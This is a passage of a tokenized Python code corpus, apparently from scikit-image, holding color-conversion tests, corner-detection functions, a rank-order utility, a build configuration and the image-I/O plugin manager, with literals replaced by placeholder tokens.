dirname ( __file__ ) , '<STR_LIT:data>' , fname ) ) <EOL> assert_array_almost_equal ( luv_array_I_obs , <EOL> xyz2luv ( self . xyz_array , I , "<STR_LIT:2>" ) , <EOL> decimal = <NUM_LIT:2> ) <EOL> def test_luv2xyz ( self ) : <EOL> assert_array_almost_equal ( luv2xyz ( self . luv_array ) , <EOL> self . xyz_array , decimal = <NUM_LIT:3> ) <EOL> for I in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> for obs in [ "<STR_LIT:2>" , "<STR_LIT>" ] : <EOL> fname = "<STR_LIT>" . format ( I , obs ) <EOL> luv_array_I_obs = np . load ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:data>' , fname ) ) <EOL> assert_array_almost_equal ( luv2xyz ( luv_array_I_obs , I , obs ) , <EOL> self . xyz_array , decimal = <NUM_LIT:3> ) <EOL> for I in [ "<STR_LIT:a>" , "<STR_LIT:e>" ] : <EOL> fname = "<STR_LIT>" . format ( I , obs ) <EOL> luv_array_I_obs = np . load ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:data>' , fname ) ) <EOL> assert_array_almost_equal ( luv2xyz ( luv_array_I_obs , I , "<STR_LIT:2>" ) , <EOL> self . xyz_array , decimal = <NUM_LIT:3> ) <EOL> def test_rgb2luv_brucelindbloom ( self ) : <EOL> """<STR_LIT>""" <EOL> gt_for_colbars = np . array ( [ <EOL> [ <NUM_LIT:100> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ) . T <EOL> gt_array = np . swapaxes ( gt_for_colbars . reshape ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:2> ) , <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> assert_array_almost_equal ( rgb2luv ( self . colbars_array ) , <EOL> gt_array , decimal = <NUM_LIT:2> ) <EOL> def test_luv_rgb_roundtrip ( self ) : <EOL> img_rgb = img_as_float ( self . 
img_rgb ) <EOL> assert_array_almost_equal ( luv2rgb ( rgb2luv ( img_rgb ) ) , img_rgb ) <EOL> def test_lab_rgb_outlier ( self ) : <EOL> lab_array = np . ones ( ( <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> lab_array [ <NUM_LIT:0> ] = [ <NUM_LIT:50> , - <NUM_LIT:12> , <NUM_LIT> ] <EOL> lab_array [ <NUM_LIT:1> ] = [ <NUM_LIT:50> , <NUM_LIT:12> , - <NUM_LIT> ] <EOL> lab_array [ <NUM_LIT:2> ] = [ <NUM_LIT> , - <NUM_LIT:4> , - <NUM_LIT> ] <EOL> rgb_array = np . array ( [ [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ] ] , <EOL> [ [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1.> ] ] , <EOL> [ [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1.> ] ] , <EOL> ] ) <EOL> assert_almost_equal ( lab2rgb ( lab_array ) , rgb_array , decimal = <NUM_LIT:3> ) <EOL> def test_lab_full_gamut ( self ) : <EOL> a , b = np . meshgrid ( np . arange ( - <NUM_LIT:100> , <NUM_LIT:100> ) , np . arange ( - <NUM_LIT:100> , <NUM_LIT:100> ) ) <EOL> L = np . ones ( a . shape ) <EOL> lab = np . dstack ( ( L , a , b ) ) <EOL> for value in [ <NUM_LIT:0> , <NUM_LIT:10> , <NUM_LIT:20> ] : <EOL> lab [ : , : , <NUM_LIT:0> ] = value <EOL> with expected_warnings ( [ '<STR_LIT>' ] ) : <EOL> lab2xyz ( lab ) <EOL> def test_lab_lch_roundtrip ( self ) : <EOL> rgb = img_as_float ( self . img_rgb ) <EOL> lab = rgb2lab ( rgb ) <EOL> lab2 = lch2lab ( lab2lch ( lab ) ) <EOL> assert_array_almost_equal ( lab2 , lab ) <EOL> def test_rgb_lch_roundtrip ( self ) : <EOL> rgb = img_as_float ( self . img_rgb ) <EOL> lab = rgb2lab ( rgb ) <EOL> lch = lab2lch ( lab ) <EOL> lab2 = lch2lab ( lch ) <EOL> rgb2 = lab2rgb ( lab2 ) <EOL> assert_array_almost_equal ( rgb , rgb2 ) <EOL> def test_lab_lch_0d ( self ) : <EOL> lab0 = self . _get_lab0 ( ) <EOL> lch0 = lab2lch ( lab0 ) <EOL> lch2 = lab2lch ( lab0 [ None , None , : ] ) <EOL> assert_array_almost_equal ( lch0 , lch2 [ <NUM_LIT:0> , <NUM_LIT:0> , : ] ) <EOL> def test_lab_lch_1d ( self ) : <EOL> lab0 = self . 
_get_lab0 ( ) <EOL> lch0 = lab2lch ( lab0 ) <EOL> lch1 = lab2lch ( lab0 [ None , : ] ) <EOL> assert_array_almost_equal ( lch0 , lch1 [ <NUM_LIT:0> , : ] ) <EOL> def test_lab_lch_3d ( self ) : <EOL> lab0 = self . _get_lab0 ( ) <EOL> lch0 = lab2lch ( lab0 ) <EOL> lch3 = lab2lch ( lab0 [ None , None , None , : ] ) <EOL> assert_array_almost_equal ( lch0 , lch3 [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , : ] ) <EOL> def _get_lab0 ( self ) : <EOL> rgb = img_as_float ( self . img_rgb [ : <NUM_LIT:1> , : <NUM_LIT:1> , : ] ) <EOL> return rgb2lab ( rgb ) [ <NUM_LIT:0> , <NUM_LIT:0> , : ] <EOL> def test_gray2rgb ( ) : <EOL> x = np . array ( [ <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:1> ] ) <EOL> assert_raises ( ValueError , gray2rgb , x ) <EOL> x = x . reshape ( ( <NUM_LIT:3> , <NUM_LIT:1> ) ) <EOL> y = gray2rgb ( x ) <EOL> assert_equal ( y . shape , ( <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> assert_equal ( y . dtype , x . dtype ) <EOL> assert_equal ( y [ ... , <NUM_LIT:0> ] , x ) <EOL> assert_equal ( y [ <NUM_LIT:0> , <NUM_LIT:0> , : ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> x = np . array ( [ [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:255> ] ] , dtype = np . uint8 ) <EOL> z = gray2rgb ( x ) <EOL> assert_equal ( z . shape , ( <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> ) ) <EOL> assert_equal ( z [ ... , <NUM_LIT:0> ] , x ) <EOL> assert_equal ( z [ <NUM_LIT:0> , <NUM_LIT:1> , : ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> def test_gray2rgb_rgb ( ) : <EOL> x = np . random . rand ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:4> ) <EOL> y = gray2rgb ( x ) <EOL> assert_equal ( x , y ) <EOL> def test_gray2rgb_alpha ( ) : <EOL> x = np . random . random ( ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:4> ) ) <EOL> assert_equal ( gray2rgb ( x , alpha = None ) . shape , ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:4> ) ) <EOL> assert_equal ( gray2rgb ( x , alpha = False ) . shape , ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:3> ) ) <EOL> assert_equal ( gray2rgb ( x , alpha = True ) . 
shape , ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:4> ) ) <EOL> x = np . random . random ( ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:3> ) ) <EOL> assert_equal ( gray2rgb ( x , alpha = None ) . shape , ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:3> ) ) <EOL> assert_equal ( gray2rgb ( x , alpha = False ) . shape , ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:3> ) ) <EOL> assert_equal ( gray2rgb ( x , alpha = True ) . shape , ( <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:4> ) ) <EOL> assert_equal ( gray2rgb ( np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:3> , <NUM_LIT> ] ] ) , <EOL> alpha = True ) [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:3> ] , <NUM_LIT:1> ) <EOL> assert_equal ( gray2rgb ( np . array ( [ [ <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:3> , <NUM_LIT:4> ] ] , dtype = np . uint8 ) , <EOL> alpha = True ) [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:3> ] , <NUM_LIT:255> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> from numpy . testing import run_module_suite <EOL> run_module_suite ( ) </s>
<s> import numpy as np <EOL> from scipy import ndimage as ndi <EOL> from scipy import stats <EOL> from . . util import img_as_float , pad <EOL> from . . feature import peak_local_max <EOL> from . . feature . util import _prepare_grayscale_input_2D <EOL> from . . feature . corner_cy import _corner_fast <EOL> from . _hessian_det_appx import _hessian_matrix_det <EOL> from . . transform import integral_image <EOL> from . . _shared . utils import safe_as_int <EOL> def _compute_derivatives ( image , mode = '<STR_LIT>' , cval = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> imy = ndi . sobel ( image , axis = <NUM_LIT:0> , mode = mode , cval = cval ) <EOL> imx = ndi . sobel ( image , axis = <NUM_LIT:1> , mode = mode , cval = cval ) <EOL> return imx , imy <EOL> def structure_tensor ( image , sigma = <NUM_LIT:1> , mode = '<STR_LIT>' , cval = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> image = _prepare_grayscale_input_2D ( image ) <EOL> imx , imy = _compute_derivatives ( image , mode = mode , cval = cval ) <EOL> Axx = ndi . gaussian_filter ( imx * imx , sigma , mode = mode , cval = cval ) <EOL> Axy = ndi . gaussian_filter ( imx * imy , sigma , mode = mode , cval = cval ) <EOL> Ayy = ndi . gaussian_filter ( imy * imy , sigma , mode = mode , cval = cval ) <EOL> return Axx , Axy , Ayy <EOL> def hessian_matrix ( image , sigma = <NUM_LIT:1> , mode = '<STR_LIT>' , cval = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> image = _prepare_grayscale_input_2D ( image ) <EOL> window_ext = max ( <NUM_LIT:1> , np . ceil ( <NUM_LIT:3> * sigma ) ) <EOL> ky , kx = np . mgrid [ - window_ext : window_ext + <NUM_LIT:1> , - window_ext : window_ext + <NUM_LIT:1> ] <EOL> gaussian_exp = np . exp ( - ( kx ** <NUM_LIT:2> + ky ** <NUM_LIT:2> ) / ( <NUM_LIT:2> * sigma ** <NUM_LIT:2> ) ) <EOL> kernel_xx = <NUM_LIT:1> / ( <NUM_LIT:2> * np . pi * sigma ** <NUM_LIT:4> ) * ( kx ** <NUM_LIT:2> / sigma ** <NUM_LIT:2> - <NUM_LIT:1> ) <EOL> kernel_xx *= gaussian_exp <EOL> kernel_xy = <NUM_LIT:1> / ( <NUM_LIT:2> * np . 
pi * sigma ** <NUM_LIT:6> ) * ( kx * ky ) <EOL> kernel_xy *= gaussian_exp <EOL> kernel_yy = kernel_xx . transpose ( ) <EOL> eps = np . finfo ( kernel_xx . dtype ) . eps <EOL> kernel_xx [ np . abs ( kernel_xx ) < eps * np . abs ( kernel_xx ) . max ( ) ] = <NUM_LIT:0> <EOL> kernel_xy [ np . abs ( kernel_xy ) < eps * np . abs ( kernel_xy ) . max ( ) ] = <NUM_LIT:0> <EOL> kernel_yy [ np . abs ( kernel_yy ) < eps * np . abs ( kernel_yy ) . max ( ) ] = <NUM_LIT:0> <EOL> Hxx = ndi . convolve ( image , kernel_xx , mode = mode , cval = cval ) <EOL> Hxy = ndi . convolve ( image , kernel_xy , mode = mode , cval = cval ) <EOL> Hyy = ndi . convolve ( image , kernel_yy , mode = mode , cval = cval ) <EOL> return Hxx , Hxy , Hyy <EOL> def hessian_matrix_det ( image , sigma ) : <EOL> """<STR_LIT>""" <EOL> image = img_as_float ( image ) <EOL> image = integral_image ( image ) <EOL> return np . array ( _hessian_matrix_det ( image , sigma ) ) <EOL> def _image_orthogonal_matrix22_eigvals ( M00 , M01 , M11 ) : <EOL> l1 = ( M00 + M11 ) / <NUM_LIT:2> + np . sqrt ( <NUM_LIT:4> * M01 ** <NUM_LIT:2> + ( M00 - M11 ) ** <NUM_LIT:2> ) / <NUM_LIT:2> <EOL> l2 = ( M00 + M11 ) / <NUM_LIT:2> - np . 
sqrt ( <NUM_LIT:4> * M01 ** <NUM_LIT:2> + ( M00 - M11 ) ** <NUM_LIT:2> ) / <NUM_LIT:2> <EOL> return l1 , l2 <EOL> def structure_tensor_eigvals ( Axx , Axy , Ayy ) : <EOL> """<STR_LIT>""" <EOL> return _image_orthogonal_matrix22_eigvals ( Axx , Axy , Ayy ) <EOL> def hessian_matrix_eigvals ( Hxx , Hxy , Hyy ) : <EOL> """<STR_LIT>""" <EOL> return _image_orthogonal_matrix22_eigvals ( Hxx , Hxy , Hyy ) <EOL> def corner_kitchen_rosenfeld ( image , mode = '<STR_LIT>' , cval = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> imx , imy = _compute_derivatives ( image , mode = mode , cval = cval ) <EOL> imxx , imxy = _compute_derivatives ( imx , mode = mode , cval = cval ) <EOL> imyx , imyy = _compute_derivatives ( imy , mode = mode , cval = cval ) <EOL> numerator = ( imxx * imy ** <NUM_LIT:2> + imyy * imx ** <NUM_LIT:2> - <NUM_LIT:2> * imxy * imx * imy ) <EOL> denominator = ( imx ** <NUM_LIT:2> + imy ** <NUM_LIT:2> ) <EOL> response = np . zeros_like ( image , dtype = np . double ) <EOL> mask = denominator != <NUM_LIT:0> <EOL> response [ mask ] = numerator [ mask ] / denominator [ mask ] <EOL> return response <EOL> def corner_harris ( image , method = '<STR_LIT:k>' , k = <NUM_LIT> , eps = <NUM_LIT> , sigma = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> Axx , Axy , Ayy = structure_tensor ( image , sigma ) <EOL> detA = Axx * Ayy - Axy ** <NUM_LIT:2> <EOL> traceA = Axx + Ayy <EOL> if method == '<STR_LIT:k>' : <EOL> response = detA - k * traceA ** <NUM_LIT:2> <EOL> else : <EOL> response = <NUM_LIT:2> * detA / ( traceA + eps ) <EOL> return response <EOL> def corner_shi_tomasi ( image , sigma = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> Axx , Axy , Ayy = structure_tensor ( image , sigma ) <EOL> response = ( ( Axx + Ayy ) - np . 
sqrt ( ( Axx - Ayy ) ** <NUM_LIT:2> + <NUM_LIT:4> * Axy ** <NUM_LIT:2> ) ) / <NUM_LIT:2> <EOL> return response <EOL> def corner_foerstner ( image , sigma = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> Axx , Axy , Ayy = structure_tensor ( image , sigma ) <EOL> detA = Axx * Ayy - Axy ** <NUM_LIT:2> <EOL> traceA = Axx + Ayy <EOL> w = np . zeros_like ( image , dtype = np . double ) <EOL> q = np . zeros_like ( image , dtype = np . double ) <EOL> mask = traceA != <NUM_LIT:0> <EOL> w [ mask ] = detA [ mask ] / traceA [ mask ] <EOL> q [ mask ] = <NUM_LIT:4> * detA [ mask ] / traceA [ mask ] ** <NUM_LIT:2> <EOL> return w , q <EOL> def corner_fast ( image , n = <NUM_LIT:12> , threshold = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> image = _prepare_grayscale_input_2D ( image ) <EOL> image = np . ascontiguousarray ( image ) <EOL> response = _corner_fast ( image , n , threshold ) <EOL> return response <EOL> def corner_subpix ( image , corners , window_size = <NUM_LIT:11> , alpha = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> wext = ( window_size - <NUM_LIT:1> ) // <NUM_LIT:2> <EOL> image = pad ( image , pad_width = wext , mode = '<STR_LIT>' , constant_values = <NUM_LIT:0> ) <EOL> corners = safe_as_int ( corners + wext ) <EOL> N_dot = np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:2> ) , dtype = np . double ) <EOL> N_edge = np . zeros ( ( <NUM_LIT:2> , <NUM_LIT:2> ) , dtype = np . double ) <EOL> b_dot = np . zeros ( ( <NUM_LIT:2> , ) , dtype = np . double ) <EOL> b_edge = np . zeros ( ( <NUM_LIT:2> , ) , dtype = np . double ) <EOL> redundancy = window_size ** <NUM_LIT:2> - <NUM_LIT:2> <EOL> t_crit_dot = stats . f . isf ( <NUM_LIT:1> - alpha , redundancy , redundancy ) <EOL> t_crit_edge = stats . f . isf ( alpha , redundancy , redundancy ) <EOL> y , x = np . mgrid [ - wext : wext + <NUM_LIT:1> , - wext : wext + <NUM_LIT:1> ] <EOL> corners_subpix = np . zeros_like ( corners , dtype = np . 
double ) <EOL> for i , ( y0 , x0 ) in enumerate ( corners ) : <EOL> miny = y0 - wext - <NUM_LIT:1> <EOL> maxy = y0 + wext + <NUM_LIT:2> <EOL> minx = x0 - wext - <NUM_LIT:1> <EOL> maxx = x0 + wext + <NUM_LIT:2> <EOL> window = image [ miny : maxy , minx : maxx ] <EOL> winx , winy = _compute_derivatives ( window , mode = '<STR_LIT>' , cval = <NUM_LIT:0> ) <EOL> winx_winx = ( winx * winx ) [ <NUM_LIT:1> : - <NUM_LIT:1> , <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> winx_winy = ( winx * winy ) [ <NUM_LIT:1> : - <NUM_LIT:1> , <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> winy_winy = ( winy * winy ) [ <NUM_LIT:1> : - <NUM_LIT:1> , <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> Axx = np . sum ( winx_winx ) <EOL> Axy = np . sum ( winx_winy ) <EOL> Ayy = np . sum ( winy_winy ) <EOL> bxx_x = np . sum ( winx_winx * x ) <EOL> bxx_y = np . sum ( winx_winx * y ) <EOL> bxy_x = np . sum ( winx_winy * x ) <EOL> bxy_y = np . sum ( winx_winy * y ) <EOL> byy_x = np . sum ( winy_winy * x ) <EOL> byy_y = np . sum ( winy_winy * y ) <EOL> N_dot [ <NUM_LIT:0> , <NUM_LIT:0> ] = Axx <EOL> N_dot [ <NUM_LIT:0> , <NUM_LIT:1> ] = N_dot [ <NUM_LIT:1> , <NUM_LIT:0> ] = - Axy <EOL> N_dot [ <NUM_LIT:1> , <NUM_LIT:1> ] = Ayy <EOL> N_edge [ <NUM_LIT:0> , <NUM_LIT:0> ] = Ayy <EOL> N_edge [ <NUM_LIT:0> , <NUM_LIT:1> ] = N_edge [ <NUM_LIT:1> , <NUM_LIT:0> ] = Axy <EOL> N_edge [ <NUM_LIT:1> , <NUM_LIT:1> ] = Axx <EOL> b_dot [ : ] = bxx_y - bxy_x , byy_x - bxy_y <EOL> b_edge [ : ] = byy_y + bxy_x , bxx_x + bxy_y <EOL> try : <EOL> est_dot = np . linalg . solve ( N_dot , b_dot ) <EOL> est_edge = np . linalg . solve ( N_edge , b_edge ) <EOL> except np . linalg . LinAlgError : <EOL> corners_subpix [ i , : ] = np . nan , np . 
nan <EOL> continue <EOL> ry_dot = y - est_dot [ <NUM_LIT:0> ] <EOL> rx_dot = x - est_dot [ <NUM_LIT:1> ] <EOL> ry_edge = y - est_edge [ <NUM_LIT:0> ] <EOL> rx_edge = x - est_edge [ <NUM_LIT:1> ] <EOL> rxx_dot = rx_dot * rx_dot <EOL> rxy_dot = rx_dot * ry_dot <EOL> ryy_dot = ry_dot * ry_dot <EOL> rxx_edge = rx_edge * rx_edge <EOL> rxy_edge = rx_edge * ry_edge <EOL> ryy_edge = ry_edge * ry_edge <EOL> var_dot = np . sum ( winx_winx * ryy_dot - <NUM_LIT:2> * winx_winy * rxy_dot <EOL> + winy_winy * rxx_dot ) <EOL> var_edge = np . sum ( winy_winy * ryy_edge + <NUM_LIT:2> * winx_winy * rxy_edge <EOL> + winx_winx * rxx_edge ) <EOL> if var_dot < np . spacing ( <NUM_LIT:1> ) and var_edge < np . spacing ( <NUM_LIT:1> ) : <EOL> t = np . nan <EOL> elif var_dot == <NUM_LIT:0> : <EOL> t = np . inf <EOL> else : <EOL> t = var_edge / var_dot <EOL> corner_class = int ( t < t_crit_edge ) - int ( t > t_crit_dot ) <EOL> if corner_class == - <NUM_LIT:1> : <EOL> corners_subpix [ i , : ] = y0 + est_dot [ <NUM_LIT:0> ] , x0 + est_dot [ <NUM_LIT:1> ] <EOL> elif corner_class == <NUM_LIT:0> : <EOL> corners_subpix [ i , : ] = np . nan , np . nan <EOL> elif corner_class == <NUM_LIT:1> : <EOL> corners_subpix [ i , : ] = y0 + est_edge [ <NUM_LIT:0> ] , x0 + est_edge [ <NUM_LIT:1> ] <EOL> corners_subpix -= wext <EOL> return corners_subpix <EOL> def corner_peaks ( image , min_distance = <NUM_LIT:1> , threshold_abs = None , threshold_rel = <NUM_LIT:0.1> , <EOL> exclude_border = True , indices = True , num_peaks = np . inf , <EOL> footprint = None , labels = None ) : <EOL> """<STR_LIT>""" <EOL> peaks = peak_local_max ( image , min_distance = min_distance , <EOL> threshold_abs = threshold_abs , <EOL> threshold_rel = threshold_rel , <EOL> exclude_border = exclude_border , <EOL> indices = False , num_peaks = num_peaks , <EOL> footprint = footprint , labels = labels ) <EOL> if min_distance > <NUM_LIT:0> : <EOL> coords = np . transpose ( peaks . 
nonzero ( ) ) <EOL> for r , c in coords : <EOL> if peaks [ r , c ] : <EOL> peaks [ r - min_distance : r + min_distance + <NUM_LIT:1> , <EOL> c - min_distance : c + min_distance + <NUM_LIT:1> ] = False <EOL> peaks [ r , c ] = True <EOL> if indices is True : <EOL> return np . transpose ( peaks . nonzero ( ) ) <EOL> else : <EOL> return peaks </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> def rank_order ( image ) : <EOL> """<STR_LIT>""" <EOL> flat_image = image . ravel ( ) <EOL> sort_order = flat_image . argsort ( ) . astype ( np . uint32 ) <EOL> flat_image = flat_image [ sort_order ] <EOL> sort_rank = np . zeros_like ( sort_order ) <EOL> is_different = flat_image [ : - <NUM_LIT:1> ] != flat_image [ <NUM_LIT:1> : ] <EOL> np . cumsum ( is_different , out = sort_rank [ <NUM_LIT:1> : ] ) <EOL> original_values = np . zeros ( ( sort_rank [ - <NUM_LIT:1> ] + <NUM_LIT:1> , ) , image . dtype ) <EOL> original_values [ <NUM_LIT:0> ] = flat_image [ <NUM_LIT:0> ] <EOL> original_values [ <NUM_LIT:1> : ] = flat_image [ <NUM_LIT:1> : ] [ is_different ] <EOL> int_image = np . zeros_like ( sort_order ) <EOL> int_image [ sort_order ] = sort_rank <EOL> return ( int_image . reshape ( image . shape ) , original_values ) </s>
<s> from skimage . _build import cython <EOL> import os . path <EOL> base_path = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> def configuration ( parent_package = '<STR_LIT>' , top_path = None ) : <EOL> from numpy . distutils . misc_util import Configuration , get_numpy_include_dirs <EOL> config = Configuration ( '<STR_LIT>' , parent_package , top_path ) <EOL> config . add_data_dir ( '<STR_LIT>' ) <EOL> cython ( [ '<STR_LIT>' ] , working_path = base_path ) <EOL> cython ( [ '<STR_LIT>' ] , working_path = base_path ) <EOL> cython ( [ '<STR_LIT>' ] , working_path = base_path ) <EOL> config . add_extension ( '<STR_LIT>' , sources = [ '<STR_LIT>' ] , <EOL> include_dirs = [ get_numpy_include_dirs ( ) ] ) <EOL> config . add_extension ( '<STR_LIT>' , sources = [ '<STR_LIT>' ] , <EOL> include_dirs = [ get_numpy_include_dirs ( ) ] ) <EOL> config . add_extension ( '<STR_LIT>' , sources = [ '<STR_LIT>' ] , <EOL> include_dirs = [ get_numpy_include_dirs ( ) ] ) <EOL> return config <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from numpy . distutils . core import setup <EOL> setup ( maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> ** ( configuration ( top_path = '<STR_LIT>' ) . todict ( ) ) <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> if sys . version . startswith ( '<STR_LIT:3>' ) : <EOL> from configparser import ConfigParser <EOL> else : <EOL> from ConfigParser import ConfigParser <EOL> import os . path <EOL> from glob import glob <EOL> from . collection import imread_collection_wrapper <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> plugin_store = None <EOL> plugin_provides = { } <EOL> plugin_module_name = { } <EOL> plugin_meta_data = { } <EOL> preferred_plugins = { <EOL> '<STR_LIT:all>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } <EOL> def _clear_plugins ( ) : <EOL> """<STR_LIT>""" <EOL> global plugin_store <EOL> plugin_store = { '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] } <EOL> _clear_plugins ( ) <EOL> def _load_preferred_plugins ( ) : <EOL> io_types = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> for p_type in io_types : <EOL> _set_plugin ( p_type , preferred_plugins [ '<STR_LIT:all>' ] ) <EOL> plugin_types = ( p for p in preferred_plugins . keys ( ) if p != '<STR_LIT:all>' ) <EOL> for p_type in plugin_types : <EOL> _set_plugin ( p_type , preferred_plugins [ p_type ] ) <EOL> def _set_plugin ( plugin_type , plugin_list ) : <EOL> for plugin in plugin_list : <EOL> if plugin not in available_plugins : <EOL> continue <EOL> try : <EOL> use_plugin ( plugin , kind = plugin_type ) <EOL> break <EOL> except ( ImportError , RuntimeError , OSError ) : <EOL> pass <EOL> def reset_plugins ( ) : <EOL> _clear_plugins ( ) <EOL> _load_preferred_plugins ( ) <EOL> def _parse_config_file ( filename ) : <EOL> """<STR_LIT>""" <EOL> parser = ConfigParser ( ) <EOL> parser . read ( filename ) <EOL> name = parser . 
sections ( ) [ <NUM_LIT:0> ] <EOL> meta_data = { } <EOL> for opt in parser . options ( name ) : <EOL> meta_data [ opt ] = parser . get ( name , opt ) <EOL> return name , meta_data <EOL> def _scan_plugins ( ) : <EOL> """<STR_LIT>""" <EOL> pd = os . path . dirname ( __file__ ) <EOL> config_files = glob ( os . path . join ( pd , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> for filename in config_files : <EOL> name , meta_data = _parse_config_file ( filename ) <EOL> plugin_meta_data [ name ] = meta_data <EOL> provides = [ s . strip ( ) for s in meta_data [ '<STR_LIT>' ] . split ( '<STR_LIT:U+002C>' ) ] <EOL> valid_provides = [ p for p in provides if p in plugin_store ] <EOL> for p in provides : <EOL> if not p in plugin_store : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , p ) ) <EOL> need_to_add_collection = ( '<STR_LIT>' not in valid_provides and <EOL> '<STR_LIT>' in valid_provides ) <EOL> if need_to_add_collection : <EOL> valid_provides . append ( '<STR_LIT>' ) <EOL> plugin_provides [ name ] = valid_provides <EOL> plugin_module_name [ name ] = os . path . basename ( filename ) [ : - <NUM_LIT:4> ] <EOL> _scan_plugins ( ) <EOL> def find_available_plugins ( loaded = False ) : <EOL> """<STR_LIT>""" <EOL> active_plugins = set ( ) <EOL> for plugin_func in plugin_store . values ( ) : <EOL> for plugin , func in plugin_func : <EOL> active_plugins . add ( plugin ) <EOL> d = { } <EOL> for plugin in plugin_provides : <EOL> if not loaded or plugin in active_plugins : <EOL> d [ plugin ] = [ f for f in plugin_provides [ plugin ] <EOL> if not f . 
startswith ( '<STR_LIT:_>' ) ] <EOL> return d <EOL> available_plugins = find_available_plugins ( ) <EOL> def call_plugin ( kind , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if not kind in plugin_store : <EOL> raise ValueError ( '<STR_LIT>' % kind ) <EOL> plugin_funcs = plugin_store [ kind ] <EOL> if len ( plugin_funcs ) == <NUM_LIT:0> : <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise RuntimeError ( msg % kind ) <EOL> plugin = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if plugin is None : <EOL> _ , func = plugin_funcs [ <NUM_LIT:0> ] <EOL> else : <EOL> _load ( plugin ) <EOL> try : <EOL> func = [ f for ( p , f ) in plugin_funcs if p == plugin ] [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> raise RuntimeError ( '<STR_LIT>' % <EOL> ( plugin , kind ) ) <EOL> return func ( * args , ** kwargs ) <EOL> def use_plugin ( name , kind = None ) : <EOL> """<STR_LIT>""" <EOL> if kind is None : <EOL> kind = plugin_store . keys ( ) <EOL> else : <EOL> if not kind in plugin_provides [ name ] : <EOL> raise RuntimeError ( "<STR_LIT>" % <EOL> ( name , kind ) ) <EOL> if kind 